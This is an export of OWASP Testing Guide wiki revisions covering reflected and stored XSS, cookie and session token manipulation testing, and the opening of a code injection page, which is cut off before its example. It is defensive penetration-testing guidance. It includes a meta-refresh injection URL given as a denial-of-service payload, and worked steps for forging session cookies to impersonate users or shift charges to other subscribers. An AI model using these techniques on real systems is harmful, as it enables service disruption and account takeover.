The '''Reflected Cross-Site Scripting''' vulnerability is by far the most common and well-known type. These holes show up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user. If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page. A classic example of this is in site search engines: if one searches for a string which includes some HTML special characters, often the search string will be redisplayed on the result page to indicate what was searched for, or will at least include the search terms in the text box for easier editing. If all occurrences of the search terms are not HTML entity encoded, an XSS hole will result.&lt;br /&gt;
&lt;br /&gt;
At first glance, this does not appear to be a serious problem since users can only inject code into their own pages. However, with a small amount of social engineering, an attacker could convince a user to follow a malicious URL which injects code into the results page, giving the attacker full access to that page's content. Due to the general requirement of the use of some social engineering in this case (and normally in DOM-Based XSS vulnerabilities as well), many programmers have disregarded these holes as not terribly important. This misconception is sometimes applied to XSS holes in general (even though this is only one type of XSS) and there is often disagreement in the security community as to the importance of cross-site scripting vulnerabilities. The simplest way to show the importance of a XSS vulnerability would be to perform a Denial of Service attack.&lt;br /&gt;
In some cases a Denial of Service attack can be performed on the server by doing the following:      &lt;br /&gt;
&lt;br /&gt;
 article.php?title=&amp;lt;meta%20http-equiv=&amp;quot;refresh&amp;quot;%20content=&amp;quot;0;&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This makes a refresh request roughly about every .3 seconds to particular page. It then acts like an infinite loop of refresh requests, potentially bringing down the web and database server by flooding it with requests. The more browser sessions that are open, the more intense the attack becomes. &lt;br /&gt;
&lt;br /&gt;
The '''Stored Cross Site Scripting''' vulnerability is the most powerful kind of  XSS attack. A Stored XSS vulnerability exists when data provided to a web application by a user is first stored persistently on the server (in a database, filesystem, or other location), and later displayed to users in a web page without being encoded using HTML entities. A real life example of this would be SAMY, the XSS vulnerability found on MySpace in October of 2005.&lt;br /&gt;
These vulnerabilities are more significant than other types because an attacker can inject the script just once. This could potentially hit a large number of other users with little need for social engineering, or the web application could even be infected by a cross-site scripting virus.&lt;br /&gt;
&lt;br /&gt;
'''Example'''&lt;br /&gt;
&lt;br /&gt;
If we have a site that permits us to leave a message to the other user (a lesson of WebGoat v3.7), and we inject a script insted of a message in the following way:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:XSSStored1.PNG]]&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now the server will store this information and when a user will click on our fake message, his browser will execute our script as the follow:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:XSSStored2.PNG]]&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The methods of injection can vary a great deal. A perfect example of how this type of an attack could impact an organization, instead of an individual, was demonstrated by Jeremiah Grossman @ BlackHat USA 2006. The demonstration gave an example of how posting a stored XSS script to a popular blog, newspaper, or page comments section of a website can cause all the visitors of that page to have their internal networks scanned and logged for a particular type of vulnerability.&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* Paul Lindner: &amp;quot;Preventing Cross-site Scripting Attacks&amp;quot; - http://www.perl.com/pub/a/2002/02/20/css.html&lt;br /&gt;
&lt;br /&gt;
* CERT: &amp;quot;CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests&amp;quot; - http://www.cert.org/advisories/CA-2000-02.html&lt;br /&gt;
&lt;br /&gt;
* RSnake: &amp;quot;XSS (Cross Site Scripting) Cheat Sheet&amp;quot; - http://ha.ckers.org/xss.html&lt;br /&gt;
&lt;br /&gt;
* Amit Klien: &amp;quot;DOM Based Cross Site Scripting&amp;quot; - http://www.securiteam.com/securityreviews/5MP080KGKW.html&lt;br /&gt;
&lt;br /&gt;
* Jeremiah Grossman: &amp;quot;Hacking Intranet Websites from the Outside &amp;quot;JavaScript malware just got a lot more dangerous&amp;quot;&amp;quot; - http://www.blackhat.com/presentations/bh-jp-06/BH-JP-06-Grossman.pdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* '''OWASP CAL9000''' - http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project&lt;br /&gt;
CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Cookie_and_Session_Token_Manipulation&amp;diff=14681</id>
		<title>Testing for Cookie and Session Token Manipulation</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Cookie_and_Session_Token_Manipulation&amp;diff=14681"/>
				<updated>2006-12-29T20:40:28Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
In this test we want to check that cookies and other session tokens are created in a secure and unpredictable way. An attacker that is able to predict and forge a weak cookie can easily hijack sessions of legitimate users.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Description of the Issue==&lt;br /&gt;
&lt;br /&gt;
Cookies are used to implement session management and are described in detail in RFC 2965. In a nutshell, when a user accesses an application which needs to keep track of the actions and identity of that user across multiple requests, a cookie (or more than one) is generated by the server and sent to the client. The client will then send the cookie back to the server in all following connections until the cookie expires or is destroyed.  The data stored in the cookie can provide to the server a large spectrum of information about who the user is, what actions he has performed so far, what his preferences are,  etc. therefore providing a state to a stateless protocol like HTTP.&lt;br /&gt;
&lt;br /&gt;
A typical example is provided by an online shopping cart. Throughout the session of a user, the application must keep track of his identity, his profile, the products that he has chosen to buy, the quantity, the individual prices, the discounts, etc. Cookies are an efficient way to store and pass this information back and forth (other methods are URL parameters and hidden fields).&lt;br /&gt;
&lt;br /&gt;
Due to the importance of the data that they store, cookies are therefore vital in the overall security of the application. Being able to tamper with cookies may result in hijacking the sessions of legitimate users, gaining higher privileges in an active session, and in general influencing the operations of the application in an unauthorized way. In this test we have to check whether the cookies issued to clients can resist a wide range of attacks aimed to interfere with the sessions of legitimate users and with the application itself. The overall goal is to be able to forge a cookie that will be considered valid by the application and that will provide some kind of unauthorized access (session hijacking, privilege escalation, ...). Usually the main steps of the attack pattern are the following:&lt;br /&gt;
* '''cookie collection''': collection of a sufficient number of cookie samples;&lt;br /&gt;
* '''cookie reverse engineering''': analysis of the cookie generation algorithm;&lt;br /&gt;
* '''cookie manipulation''': forging of a valid cookie in order to perform the attack. This last step might require a large number of attempts, depending on how the cookie is created (cookie brute-force attack).&lt;br /&gt;
&lt;br /&gt;
Another pattern of attack consists of overflowing a cookie. Strictly speaking, this attack has a different nature, since here we are not trying to recreate a perfectly valid cookie. Instead, our goal is to overflow a memory area, thereby interfering with the correct behavior of the application and possibly injecting (and remotely executing) malicious code.&lt;br /&gt;
&lt;br /&gt;
==Black Box Testing and Examples==&lt;br /&gt;
&lt;br /&gt;
All interaction between the Client and Application should be tested at least against the following criteria:&lt;br /&gt;
* Are all Set-Cookie directives tagged as Secure?	&lt;br /&gt;
* Do any Cookie operations take place over unencrypted transport?	&lt;br /&gt;
* Can the Cookie be forced over unencrypted transport?  	&lt;br /&gt;
* If so, how does the application maintain security?	&lt;br /&gt;
* Are any Cookies persistent?	&lt;br /&gt;
* What Expires= times are used on persistent cookies, and are they reasonable?	&lt;br /&gt;
* Are cookies that are expected to be transient configured as such?	&lt;br /&gt;
* What HTTP/1.1 Cache-Control settings are used to protect Cookies?	&lt;br /&gt;
* What HTTP/1.0 Cache-Control settings are used to protect Cookies?	&lt;br /&gt;
&lt;br /&gt;
'''Cookie collection'''&lt;br /&gt;
&lt;br /&gt;
The first step required in order to manipulate the cookie is obviously to understand how the application creates and manages cookies. For this task, we have to try to answer the following questions:&lt;br /&gt;
&lt;br /&gt;
* How many cookies are used by the application ?&lt;br /&gt;
Surf the application. Note when cookies are created. Make a list of received cookies, the page that sets them (with the set-cookie directive), the domain for which they are valid, their value, and their characteristics.&lt;br /&gt;
* Which parts of the the application generate and/or modify the cookie ?&lt;br /&gt;
Surfing the application, find which cookies remain constant and which get modified. What events modify the cookie ?&lt;br /&gt;
* Which parts of the application require this cookie in order to be accessed and utilized?&lt;br /&gt;
Find out which parts of the application need a cookie. Access a page, then try again without the cookie, or with a modified value of it. Try to map which cookies are used where.&lt;br /&gt;
&lt;br /&gt;
A spreadsheet mapping each cookie to the corresponding application parts and the related information can be a valuable output of this phase.&lt;br /&gt;
&lt;br /&gt;
'''Cookie reverse engineering'''&lt;br /&gt;
----&lt;br /&gt;
Now that we have enumerated the cookies and have a general idea of their use, it is time to have a deeper look at cookies that seem interesting. Which cookies are we interested in? A cookie, in order to provide a secure method of session management, must combine several characteristics, each of which is aimed to protect the cookie from a different class of attacks. These characteristics are summarized below:&lt;br /&gt;
#Unpredictability: a cookie must contain some amount of hard-to-guess data. The harder it is to forge a valid cookie, the harder is to break into legitimate user's session. If an attacker can guess the cookie used in an active session of a legitimate user, he/she will be able to fully impersonate that user (session hijacking). In order to make a cookie unpredictable, random values and/or cryptography can be used.&lt;br /&gt;
#Tamper resistance: a cookie must resist malicious attempts of modification. If we receive a cookie like  IsAdmin=No, it is trivial to modify it to get administrative rights, unless the application performs a double check (for instance appending to the cookie an encrypted hash of its value)&lt;br /&gt;
#Expiration: a critical cookie must be valid only for an appropriate period of time and must be deleted from disk/memory afterwards in order to avoid the risk of being replayed. This does not apply to cookies that store non-critical data that needs to be remembered across sessions (e.g.: site look-and-feel)&lt;br /&gt;
#“Secure” flag: a cookie whose value is critical for the integrity of the session should have this flag enabled in order to allow its transmission only in an encrypted channel to deter eavesdropping.&lt;br /&gt;
&lt;br /&gt;
The approach here is to collect a sufficient number of instances of a cookie and start looking for patterns in their value. The exact meaning of “sufficient” can vary from a handful of samples if the cookie generation method is very easy to break to several thousands if we need to proceed with some mathematical analysis (e.g.: chi-squares, attractors, ..., see later).&lt;br /&gt;
&lt;br /&gt;
It is important to pay particular attention to the workflow of the application, as the state of a session can have a heavy impact on collected cookies: a cookie collected before being authenticated can be very different from a cookie obtained after the authentication.&lt;br /&gt;
&lt;br /&gt;
Another aspect to keep into consideration is time: always record the exact time when a cookie has been obtained, when there is the possibility that time plays a role in the value of the cookie (the server could use a timestamp as part of the cookie value). The time recorded could be the local time or the server's timestamp included in the HTTP response (or both).&lt;br /&gt;
&lt;br /&gt;
Analyzing the collected values, try to figure out all variables that could have influenced the cookie value and try to vary them one at the time. Passing to the server modified versions of the same cookie can be very helpful in understanding how the application reads and processes the cookie.&lt;br /&gt;
&lt;br /&gt;
Examples of checks to be performed at this stage include:&lt;br /&gt;
* What character set is used in the cookie ? Has the cookie a numeric value ? Alphanumeric ? Hexadecimal ? What happens inserting in a cookie characters that do not belong to the expected charset ?&lt;br /&gt;
* Is the cookie composed of different sub-parts carrying different pieces of information ? How are the different parts separated ? With which delimiters ? Some parts of the cookie could have a higher variance, others might be constant, others could assume only a limited set of values. Breaking down the cookie to its base components is the first and fundamental step. An example of an easy-to-spot structured cookie is the following:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ID=5a0acfc7ffeb919:CR=1:TM=1120514521:LM=1120514521:S=j3am5KzC4v01ba3q&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In this example we see 5 different fields, carrying different types of data:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ID – hexadecimal&lt;br /&gt;
CR – small integer&lt;br /&gt;
TM and LM – large integer. (And curiously they hold the same value. Worth to see what happens modifying one of them)&lt;br /&gt;
S – alphanumeric&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Even when no delimiters are used, having enough samples can help. As an example, let's look at the following series:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
0123456789abcdef&lt;br /&gt;
================&lt;br /&gt;
1 323a4f2cc76532gj&lt;br /&gt;
2 95fd7710f7263hd8&lt;br /&gt;
3 7211b3356782687m&lt;br /&gt;
4 31bbf9ee87966bbs&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
We have no separators here, but the different parts start to show up. We seem to have a 2-digit decimal number (columns #0 and #1), a 7-digit hexadecimal number (#2-#8),  a constant “7” (#9), a 3-digit decimal number (#a-#c) and a 3-character string (#d-#f). However, there are still some shades: the first column is always odd, so it may be a value of its own in which the least significant bit is always 1. Or maybe the first 9 columns are just one hexadecimal value. Collecting a few more samples will quickly answer our last questions.&lt;br /&gt;
&lt;br /&gt;
* Does the cookie name provide some hints about the nature of data it stores? As hinted before, a cookie named “IsAdmin” would be a great target to play with&lt;br /&gt;
* Does the cookie (or its parts) seem to be encoded/encrypted? A 16-byte-long pseudo-random value could be a sign of a MD5 hash. A 20-byte value could indicate a SHA-1 hash. A string of seemingly random alphanumeric characters could actually hide a base64 encoding that can be easily reversed using WebScarab or even a simple Perl script. A cookie whose value is “YWRtaW46WW91V29udEd1ZXNzTWU=” would translate into a more friendly “admin:YouWontGuessMe”. Another option is that the value has been obfuscated -- bring it with some string.&lt;br /&gt;
* What data is included in the cookie? Examples of data that can be stored in the cookie include: username, password, timestamp, role (e.g.: user, admin,...), and source IP address. It is important at this stage to distinguish which pieces of information have a deterministic value and which have a random nature.&lt;br /&gt;
* If the cookie contains information about the source IP address, is it a corresponding check enforced server side? What happened when changing, inside the same session, the IP address with which we contact the server? Is the request rejected?&lt;br /&gt;
* Does the cookie contain information about the application workflow? A cookie named “FailedLoginAttemps” could trigger an account logout. Being able to change its value keeping it to zero could allow a brute-force attack against one or more accounts.&lt;br /&gt;
* In case of numeric values, what are their boundaries? In the previous example, CR can probably hold a very limited set of values, while TM and LM use a much broader space. Can a field contain a negative number? If not, what happens forcing a negative number in it ? Is it possible to guess how many bytes are allocated for the value? If a cookie seems to assume values between 0 and 65535 only, then probably it is stored in an unsigned 2-bytes variable. What happens trying to overflow it ? If the cookie holds a string, how long can it be?&lt;br /&gt;
* If we start multiple separate sessions, how do the delivered cookies change? Let's say that we login 5 times in a row and we receive the following cookies:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
id=7612542756:cnt=a5c8:grp=0&lt;br /&gt;
id=7612542756:cnt=a5c9:grp=0&lt;br /&gt;
id=7612542756:cnt=a5ca:grp=0&lt;br /&gt;
id=7612542756:cnt=a5cb:grp=0&lt;br /&gt;
id=7612542756:cnt=a5cd:grp=0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* As we can see, we have two constant fields (“id” and “grp”) that probably identify us, so these parts are unlikely to change in future attempts. A third field (“cnt”) changes, however, and looks like a hexadecimal 2-bytes counter. Between the 4th and the 5th cookie however we see that we have missed a value, meaning that someone else probably logged in.&lt;br /&gt;
* Does the cookie have an expiration time? Is it enforced server side (in order to do this check you can simply modify the set-cookie directive on the fly to indicate a much longer validity period and see whether the server respects it)? Enforcing of expiration times is extremely important as a defence against reply attacks.&lt;br /&gt;
&lt;br /&gt;
If the cookie has authentication purposes, it is better to have at least 2 different users in order to check how the cookie varies when belonging to different accounts.&lt;br /&gt;
Sometimes, a cookie generation algorithm uses only deterministic values. 0nce we understand the algorithm logic, we can easily forge a valid cookie. But sometimes things get more complex and a cookie (or parts of it) is generated by algorithms that do not let us easily forge valid cookies with a single attempt. For instance, a cookie might include a pseudo-random value. Another example is the use of encryption or hashing functions. Let's have a look at the following 5 cookies:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
1: c75918d4144fc122975590ffa48627c3b1f01bb1&lt;br /&gt;
2: 9ec985ef773e19bab8b43e8ad7b6b4d322b5e50d&lt;br /&gt;
3: d49e0a658b323c4d7ee888275225b4381b70475c&lt;br /&gt;
4: 9ddc4dc3900890cf9c22c7b82fa3143a56b17cf6&lt;br /&gt;
5: fb000aa881948bffbcc01a94a13165fece3349c2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Is there any easy-to-spot generation algorithm? Except for the fact that they are all 20 bytes long, there is not much to be said. But they happen to be the SHA-1 hash of the five cookies of the previous example, which varied only by a 2-bytes counter. Therefore, they can assume only 65536 (216) different values, which is not a tiny number, but still a lot less than the 2160  possible values of a SHA-1 hash. More precisely, we have reduced the cookie space 2.23e+43 (2144) times. &lt;br /&gt;
&lt;br /&gt;
The only way to spot this behavior would be to collect enough cookies - a simple Perl script would be enough for the task. WebScarab and Cookie Digger also provide very efficient and flexible cookie collection and analysis tools.&lt;br /&gt;
Once we know that this cookie can assume only a very limited set of values, we now know that an impersonation attack against an active user has much higher chances to succeed than it would appear. We only have to change the user id and generate the 65536 corresponding possible hashed cookies.&lt;br /&gt;
&lt;br /&gt;
In general, a seemingly random cookie can be less random than it seems, and collecting a high number of cookies can provide valuable information about which values are more likely to be used, revealing hidden properties that could make guessing a valid cookie a viable attack.&lt;br /&gt;
&lt;br /&gt;
The number of cookies that are needed to perform such an analysis is a function of a high number of factors:&lt;br /&gt;
* Algorithm resistance to pattern discovery&lt;br /&gt;
* Computing resources that are available for the analysis&lt;br /&gt;
* Time needed to collect a single cookie&lt;br /&gt;
&lt;br /&gt;
Once enough samples have been collected, it's time to look for patterns. For example, some characters might be more frequent than others, and another Perl script may be enough to discover that.&lt;br /&gt;
&lt;br /&gt;
There are some statistical methods that can help in finding patterns in apparently random &lt;br /&gt;
numbers. A detailed discussion of these methods is outside the scope of this paper, but a few approaches are the following:&lt;br /&gt;
* Strange Attractors and TCP/IP Sequence Number Analysis &amp;lt;u&amp;gt;http://www.bindview.com/Services/Razor/Papers/2001/tcpseq.cfm&amp;lt;/u&amp;gt;&lt;br /&gt;
* Correlation Coefficient - &amp;lt;u&amp;gt;http://mathworld.wolfram.com/CorrelationCoefficient.html&amp;lt;/u&amp;gt;&lt;br /&gt;
* ENT - &amp;lt;u&amp;gt;http://fourmilab.ch/random/&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If the cookie seems to have some kind of time dependency, a good approach is to collect a large amount of samples in a short time in order to see whether it is possible to reduce (or eliminate) the time impact when guessing “nearby” cookies.&lt;br /&gt;
&lt;br /&gt;
'''Cookie manipulation'''&lt;br /&gt;
----&lt;br /&gt;
Once you have squeezed out as much information as possible from the cookie, it is time to start to modify it. The methodologies here heavily depend on the results of the analysis phase, but we can provide some examples:&lt;br /&gt;
&lt;br /&gt;
'''Example 1: Cookie with identity in clear text'''&lt;br /&gt;
&lt;br /&gt;
In figure 1, we show an example of cookie manipulation in an application that allows subscribers of a mobile telecom operator to send MMS messages via Internet. Surfing the application using OWASP WebScarab or BurpProxy, we can see that after the authentication process, the cookie ''msidnOneShot'' contains the sender’s telephone number. This cookie is used to identify the user for the service payment process. However, the phone number is stored in clear and is not protected in any way. Thus, if we modify the cookie from ''msidnOneShot=3*******59'' to&lt;br /&gt;
''msidnOneShot=3*******99, ''the mobile user who owns the number 3*******99 will pay the MMS message!&lt;br /&gt;
&lt;br /&gt;
[[Image:Example of Cookie with identity in clear text.gif]]&lt;br /&gt;
 &lt;br /&gt;
Figure 1 - Example of Cookie with identity in clear text&lt;br /&gt;
&lt;br /&gt;
Source: A Case Study of a Web Application Vulnerability - Matteo Meucci: http://www.owasp.org/docroot/owasp/misc/OWASP-Italy-MMS-Spoofing.zip&lt;br /&gt;
&lt;br /&gt;
'''Example 2: guessable cookie '''&lt;br /&gt;
&lt;br /&gt;
An example of a cookie whose value is easy to guess and who can be used to impersonate other users can be found in OWASP WebGoat, in the “Weak Authentication cookie” lesson. In this example, you start with the knowledge of two username/password couples (corresponding to the users 'webgoat' and 'aspect'). The goal is to reverse engineer the cookie creation logic and break into the account of user 'Alice'. &lt;br /&gt;
Authenticating to the application using these known couples, you can collect the corresponding authentication cookies. In table 1 you can find the associations that bind each username/password couple to the corresponding cookie, together with the login exact time.&lt;br /&gt;
&lt;br /&gt;
{| border=1&lt;br /&gt;
 || '''Username''' || '''Password''' || '''Authentication Cookie - Time'''&lt;br /&gt;
|-&lt;br /&gt;
 || webgoat || Webgoat || 65432ubphcfx – 10/7/2005-10:10&lt;br /&gt;
65432ubphcfx – 10/7/2005-10:11&lt;br /&gt;
|-&lt;br /&gt;
 || aspect || Aspect || 65432udfqtb – 10/7/2005-10:12&lt;br /&gt;
65432udfqtb – 10/7/2005-10:13&lt;br /&gt;
|-&lt;br /&gt;
 || Alice || ????? || ???????????&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table 1: Cookie collections &lt;br /&gt;
&lt;br /&gt;
First of all, we can note that the authentication cookie remains constant for the same user across different logons, showing a first critical vulnerability to replay attacks: if we are able to steal a valid cookie (using for example a XSS vulnerability), we can use it to hijack the session of the corresponding user without knowing his/her credentials.&lt;br /&gt;
Additionally, we note that the “webgoat” and “aspect” cookies have a common part:&lt;br /&gt;
“65432u”. “65432” seems to be a constant integer. What about “u” ? The strings “webgoat” and “aspect” both end with the “t” letter, and “u” is the letter following it.&lt;br /&gt;
So let's see the letter following each letter in “webgoat”:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
1st char: “w” + 1 =“x”&lt;br /&gt;
2nd char: “e” + 1 = “f”&lt;br /&gt;
3rd char: “b” + 1 = “c”&lt;br /&gt;
4th char: “g” + 1= “h”&lt;br /&gt;
5th char: “o” + 1= “p”&lt;br /&gt;
6th char: “a” + 1= “b”&lt;br /&gt;
7th char: “t” + 1 = “u”&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
We obtain “xfchpbu”, which, when inverted, gives us exactly “ubphcfx”. The algorithm  also fits perfectly for the user 'aspect', so we only have to apply it to user 'Alice', for which the cookie results to be “65432fdjmb”. We repeat the authentication to the application providing the “webgoat” credentials, substitute the received cookie with the one that we have just calculated for Alice and…Bingo! Now the application identifies us as “Alice” instead of “webgoat”.&lt;br /&gt;
&lt;br /&gt;
'''Brute force'''&lt;br /&gt;
----&lt;br /&gt;
The use of a brute force attack to find the right authentication cookie could be a heavy and time consuming technique. FoundStone Cookie Digger can help to collect a large number of cookies, giving the average length and the character set of the cookie. In advance, the tool compares the different values of the cookie to check how many characters are changing for every subsequent login. If the cookie values do not remain the same on subsequent logins, CookieDigger gives the attacker longer periods of time to perform brute force attempts.&lt;br /&gt;
In the following table, we show an example in which we have collected all the cookies from a public site, trying 10 authentication attempts. For each type of cookie collected, you have an estimate of all the possible attempts needed to “brute force” the cookie. &lt;br /&gt;
&lt;br /&gt;
{| border=1&lt;br /&gt;
 || '''Cookie predictability''' &lt;br /&gt;
|-&lt;br /&gt;
 ||CookieName ||X_ID ||COOKIE_IDENT_SERV ||X_ID_YACAS ||COOKIE_IDENT ||X_UPC ||CAS_UPC ||CAS_SCC ||COOKIE_X ||vgnvisitor&lt;br /&gt;
|-&lt;br /&gt;
 ||PridictabilityIndex &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
{| border=1&lt;br /&gt;
 ||'''High''' &lt;br /&gt;
|-&lt;br /&gt;
 ||'''335697***''' &lt;br /&gt;
|-&lt;br /&gt;
 ||'''CookieName''' ||'''Has Username or Password''' ||'''Average Length''' ||'''Character Set''' ||'''Randomness Index''' ||'''Brute Force Attempts''' &lt;br /&gt;
|-&lt;br /&gt;
 ||X_ID ||False ||820 ||, 0-9, a-f ||52,43 ||2,60699329187639E+129 &lt;br /&gt;
|-&lt;br /&gt;
 ||COOKIE_IDENT_SERV ||False ||54 ||, +, /-9, A-N, P-X, Z, a-z ||31,19 ||12809303223894,6 &lt;br /&gt;
|-&lt;br /&gt;
 ||X_ID_YACAS ||False ||820 ||, 0-9, a-f ||52,52 ||4,46965862559887E+129 &lt;br /&gt;
|-&lt;br /&gt;
 ||COOKIE_IDENT ||False ||54 ||, +, /-9, A-N, P-X, Z, a-z ||31,19 ||12809303223894,6 &lt;br /&gt;
|-&lt;br /&gt;
 ||X_UPC ||False ||172 ||, 0-9, a-f ||23,95 ||2526014396252,81 &lt;br /&gt;
|-&lt;br /&gt;
 ||CAS_UPC ||False ||172 ||, 0-9, a-f ||23,95 ||2526014396252,81 &lt;br /&gt;
|-&lt;br /&gt;
 ||CAS_SCC ||False ||152 ||, 0-9, a-f ||34,65 ||7,14901878613151E+15 &lt;br /&gt;
|-&lt;br /&gt;
 ||COOKIE_X ||False ||32 ||, +, /, 0, 8, 9, A, C, E, K, M, O, Q, R, W-Y, e-h, l, m, q, s, u, y, z ||0 ||1 &lt;br /&gt;
|-&lt;br /&gt;
 ||vgnvisitor ||False ||26 ||, 0-2, 5, 7, A, D, F-I, K-M, O-Q, W-Y, a-h, j-q, t, u, w-y, ~ ||33,59 ||18672264717,3479 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
{|border=1&lt;br /&gt;
 ||X_ID &lt;br /&gt;
|-&lt;br /&gt;
||5573657249643a3d333335363937393835323b4d736973646e3a3d333335363937393835323b537461746f436f6e73656e736f3a3d303b4d65746f646f417574656e746963…………..0525147746d6e673d3d &lt;br /&gt;
|-&lt;br /&gt;
||5573657249643a3d333335363937393835323b4d736973646e3a3d333335363937393835323b537461746f436f6e73656e736f3a3d303b4d65746f646f417574656e746963617a696f6e6…..354730632f5346673d3d &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
'''Table 2: An example of CookieDigger report'''&lt;br /&gt;
&lt;br /&gt;
'''Overflow'''&lt;br /&gt;
----&lt;br /&gt;
Since the cookie value, when received by the server, will be stored in one or more variables, there is always the chance of performing a boundary violation of that variable. Overflowing a cookie can lead to all the outcomes of buffer overflow attacks. A Denial of Service is usually the easiest goal, but the execution of remote code can also be possible. However, this usually requires some detailed knowledge about the architecture of the remote system, as any buffer overflow technique is heavily dependent on the underlying operating system and memory management in order to correctly calculate offsets to properly craft and align inserted code.&lt;br /&gt;
&lt;br /&gt;
Example: &amp;lt;u&amp;gt;http://seclists.org/lists/fulldisclosure/2005/Jun/0188.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
* RFC 2965 “HTTP State Management Mechanism”&lt;br /&gt;
* RFC 1750 “Randomness Recommendations for Security”&lt;br /&gt;
* “Strange Attractors and TCP/IP Sequence Number Analysis”: http://www.bindview.com/Services/Razor/Papers/2001/tcpseq.cfm&lt;br /&gt;
* Correlation Coefficient: http://mathworld.wolfram.com/CorrelationCoefficient.html&lt;br /&gt;
* ENT: http://fourmilab.ch/random/&lt;br /&gt;
* http://seclists.org/lists/fulldisclosure/2005/Jun/0188.html&lt;br /&gt;
* Darrin Barrall: &amp;quot;Automated Cookie Analisys&amp;quot; –  http://www.spidynamics.com/assets/documents/SPIcookies.pdf&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
* [[:Category:OWASP WebScarab Project|OWASP's WebScarab]] features a session token analysis mechanism. You can read [[How to test session identifier strength with WebScarab]].&lt;br /&gt;
* Foundstone CookieDigger - http://www.foundstone.cm/resources/proddesc/cookiedigger.htm&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Katie.mcdowell</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Testing_for_Code_Injection_(OTG-INPVAL-012)&amp;diff=14680</id>
		<title>Testing for Code Injection (OTG-INPVAL-012)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Testing_for_Code_Injection_(OTG-INPVAL-012)&amp;diff=14680"/>
				<updated>2006-12-29T20:03:06Z</updated>
		
		<summary type="html">&lt;p&gt;Katie.mcdowell: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
 &lt;br /&gt;
This section describes how a tester can check if it is possible to enter code as input on a web page and have it executed by the web server. More information about Code Injection here: http://www.owasp.org/index.php/Code_Injection&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue ==&lt;br /&gt;
 &lt;br /&gt;
Code Injection testing involves a tester submitting code as input that is processed by the web server as dynamic code or as an included file.  These tests can target various server-side scripting engines, i.e. ASP, PHP, etc.  Proper validation and secure coding practices need to be employed to protect against these attacks.&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
 &lt;br /&gt;
'''Testing for PHP Injection vulnerabilities:'''&lt;br /&gt;
&lt;br /&gt;
Using the querystring, the tester can inject code (in this example, a malicious url) to be processed as part of the included file:&lt;br /&gt;
&lt;br /&gt;
